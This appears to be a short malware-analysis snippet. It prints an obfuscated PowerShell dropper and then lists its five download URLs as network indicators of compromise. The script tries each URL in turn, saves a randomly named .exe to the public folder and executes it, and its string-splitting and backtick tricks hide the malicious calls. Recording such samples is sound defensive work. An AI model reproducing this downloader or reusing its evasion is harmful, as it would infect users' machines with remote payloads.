ieX(  .ieX .ieX ($nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000
, 282133);$ADCX = ' http://www.elosduvale.com.br/OUFW/?http://dulfacolltda.com/rL7zkpa/?http://jati.com.au/kRBGS7/?http
s://www.blueyachtcharter.com/DIjVX4U/?http://reviewzaap.azurewebsites.net/oMgoZ/'.Split('?');$SDC = $env:public + '\' +
$NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item
')($SDC);break;}catch{}} |& ( $sheLLiD[1]+$shElLiD[13]+'X') )

Network IoCs:

http://www.elosduvale.com.br/OUFW/
http://dulfacolltda.com/rL7zkpa/
http://jati.com.au/kRBGS7/
https://www.blueyachtcharter.com/DIjVX4U/
http://reviewzaap.azurewebsites.net/oMgoZ/
